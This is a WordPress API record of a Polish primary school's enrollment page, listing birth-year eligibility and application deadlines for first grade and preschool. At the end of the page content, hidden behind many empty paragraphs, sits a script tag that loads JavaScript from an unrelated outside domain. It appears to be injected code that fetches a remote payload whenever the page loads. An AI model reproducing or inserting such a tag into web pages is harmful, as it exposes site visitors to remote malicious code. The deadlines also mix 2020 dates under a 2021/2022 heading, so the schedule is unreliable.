{"id":10923,"date":"2019-02-14T06:57:43","date_gmt":"2019-02-14T05:57:43","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=10923"},"modified":"2021-02-04T13:56:41","modified_gmt":"2021-02-04T12:56:41","slug":"informacje-w-sprawie-rekrutacji","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/informacje-w-sprawie-rekrutacji\/","title":{"rendered":"Informacje w sprawie rekrutacji"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p style=\"text-align: center;\">Szko\u0142a Podstawowa im. Anny Jenke w Mrowinach og\u0142asza\u00a0 <strong>zapisy <\/strong>dzieci do klas pierwszych i oddzia\u0142u przedszkolnego<\/p>\n<p style=\"text-align: center;\">na rok szkolny 2021\/2022<\/p>\n<p>&nbsp;<\/p>\n<p>Do klasy I zapisujemy dzieci urodzone:<\/p>\n<p>&#8211; w 2014 r. ( siedmiolatki),<\/p>\n<p>&#8211; w 2015 r. (sze\u015bciolatki), kt\u00f3re na wniosek rodzic\u00f3w, jako sze\u015bciolatki zostan\u0105 zapisane do klasy pierwszej je\u017celi spe\u0142niaj\u0105 jeden z poni\u017cszych warunk\u00f3w:<\/p>\n<p>* korzysta\u0142y z wychowania przedszkolnego w roku szkolnym 2020\/2021,<\/p>\n<p>lub<\/p>\n<p>* uzyska\u0142y opini\u0119 poradni psychologiczno- pedagogicznej o mo\u017cliwo\u015bci rozpocz\u0119ci nauki \u00a0\u00a0\u00a0w szkole podstawowej.<\/p>\n<p><strong><u>Terminy i zasady post\u0119powania rekrutacyjnego do klas pierwszych:<\/u><\/strong><\/p>\n<p>&#8211; wydawanie wniosk\u00f3w o przyj\u0119cie dziecka do szko\u0142y (od 22.02.2021 r. w godz. 8:00 &#8211; 14:00)<\/p>\n<p>&#8211; z\u0142o\u017cenie wniosku o przyj\u0119cie do szko\u0142y (od 24.02.2020 r. do 23.03.2020 r. w godz. 7:00 &#8211; 15:00)<\/p>\n<p>&#8211; weryfikacja wniosk\u00f3w o przyj\u0119cie do szko\u0142y podstawowej przez komisj\u0119 rekrutacyjn\u0105 \u00a0\u00a0(25.03.2020 r. &#8211; 27.03.2020 r.)<\/p>\n<p>&#8211; podanie do publicznej wiadomo\u015bci przez komisj\u0119 rekrutacyjn\u0105 listy kandydat\u00f3w zakwalifikowanych i niezakwalifikowanych (30.03.2020 r.)<\/p>\n<p>&#8211; potwierdzenie przez rodzica kandydata woli przyj\u0119cia do szko\u0142y w postaci pisemnego o\u015bwiadczenia (31.03.2020 r. &#8211; 06.04.2020 r.)<\/p>\n<p>&#8211; podanie do publicznej wiadomo\u015bci przez komisj\u0119 rekrutacyjn\u0105 listy dzieci przyj\u0119tych i nieprzyj\u0119tych (07.04.2020 r.)<\/p>\n<p>&nbsp;<\/p>\n<p>Do oddzia\u0142\u00f3w przedszkolnych zapisujemy dzieci urodzone:<\/p>\n<p>&#8211; w 2014 r. (sze\u015bciolatki), w 2015 r. (pi\u0119ciolatki)i w 2016 r.(czterolatki) \u00a0-( wniosek \u00a0do pobrania) lub deklaracja o kontynuacji dla dzieci, kt\u00f3re realizuj\u0105 wychowanie przedszkolne w naszej szkole od 1 wrze\u015bnia 2019 r. (deklaracja do pobrania),<\/p>\n<p><strong><u>Terminy i zasady post\u0119powania rekrutacyjnego do oddzia\u0142\u00f3w przedszkolnych:<\/u><\/strong><\/p>\n<p>&#8211; wydawanie wniosk\u00f3w o przyj\u0119cie dziecka do szko\u0142y (od 17.02.2020 r. w godz. 7:00 &#8211; 15:00)<\/p>\n<p>&#8211; z\u0142o\u017cenie wniosku o przyj\u0119cie do szko\u0142y (od 17.02.2020 r. do 02.03.2020 r. w godz. 7:00 &#8211; 15:00)<\/p>\n<p>&#8211; weryfikacja wniosk\u00f3w o przyj\u0119cie do oddzia\u0142u przedszkolnego przez komisj\u0119 rekrutacyjn\u0105 (do 10.03.2020 r.)<\/p>\n<p>&#8211; podanie do publicznej wiadomo\u015bci przez komisj\u0119 rekrutacyjn\u0105 listy kandydat\u00f3w zakwalifikowanych i niezakwalifikowanych (12.03.2020 r.)<\/p>\n<p>&#8211; potwierdzenie przez rodzica kandydata woli przyj\u0119cia do oddzia\u0142u przedszkolnego w postaci pisemnego o\u015bwiadczenia (13.03.2020 r. &#8211; 25.03.2020 r.)<\/p>\n<p>&#8211; podanie do publicznej wiadomo\u015bci przez komisj\u0119 rekrutacyjn\u0105 listy dzieci przyj\u0119tych i nieprzyj\u0119tych (30.03.2020 \u00a0r.)<\/p>\n<p>&nbsp;<\/p>\n<p>WSZYSTKIE WNIOSKI DO POBRANIA W SEKRETARIACIE SZKO\u0141Y<\/p>\n<p>Dodatkowe informacje mo\u017cna uzyska\u0107 pod numerem tel.: 74 8580575<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Szko\u0142a Podstawowa im. Anny Jenke w Mrowinach og\u0142asza\u00a0 zapisy dzieci do klas pierwszych i oddzia\u0142u przedszkolnego na rok szkolny 2021\/2022 &nbsp; Do klasy I zapisujemy dzieci urodzone: &#8211; w 2014 r. ( siedmiolatki), &#8211; w 2015 r. (sze\u015bciolatki), kt\u00f3re na wniosek rodzic\u00f3w, jako sze\u015bciolatki zostan\u0105 zapisane do klasy pierwszej je\u017celi spe\u0142niaj\u0105 jeden z poni\u017cszych [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/10923"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=10923"}],"version-history":[{"count":7,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/10923\/revisions"}],"predecessor-version":[{"id":15877,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/10923\/revisions\/15877"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=10923"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}